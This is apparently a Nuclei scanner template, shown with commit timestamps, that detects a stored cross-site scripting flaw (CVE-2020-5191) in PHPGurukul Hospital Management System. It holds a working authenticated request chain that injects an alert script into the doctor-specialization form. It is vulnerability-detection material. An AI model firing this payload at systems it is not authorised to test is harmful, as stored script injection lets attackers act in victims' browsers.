nuclei-templates/http/cves/2020/CVE-2020-5191.yaml

59 lines
1.8 KiB
YAML
Raw Normal View History

2022-08-27 06:09:36 +00:00
id: CVE-2020-5191
2022-08-27 14:09:13 +00:00
2022-08-27 06:09:36 +00:00
info:
name: PHPGurukul Hospital Management System - Cross-Site Scripting
2022-08-27 06:09:36 +00:00
author: TenBird
2022-08-27 14:09:13 +00:00
severity: medium
description: |
PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
2022-08-27 06:09:36 +00:00
reference:
2022-08-27 14:09:13 +00:00
- https://www.exploit-db.com/exploits/47841
- https://phpgurukul.com/hospital-management-system-in-php/
- https://nvd.nist.gov/vuln/detail/CVE-2020-5191
2022-08-27 06:09:36 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-08-27 06:09:36 +00:00
cve-id: CVE-2020-5191
cwe-id: CWE-79
cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:*:*:*:*:*:*:*:*
epss-score: 0.00311
2022-08-27 14:09:13 +00:00
metadata:
max-request: 2
2023-06-04 08:13:42 +00:00
verified: true
tags: cve2020,hms,cms,xss,authenticated,edb,cve
2022-08-27 06:09:36 +00:00
http:
2022-08-27 06:09:36 +00:00
- raw:
- |
POST /hospital/hms/admin/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-08-27 14:09:13 +00:00
2022-08-27 06:12:21 +00:00
username={{username}}&password={{password}}&submit=&submit=
2022-08-27 14:09:13 +00:00
2022-08-27 06:09:36 +00:00
- |
POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-08-27 14:09:13 +00:00
doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
2022-08-27 06:09:36 +00:00
host-redirects: true
2022-08-27 14:09:13 +00:00
max-redirects: 2
2022-08-27 06:09:36 +00:00
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-08-30 05:45:06 +00:00
- '<td class="hidden-xs"></td><script>alert(document.domain);</script><td>'
2022-08-27 14:09:13 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200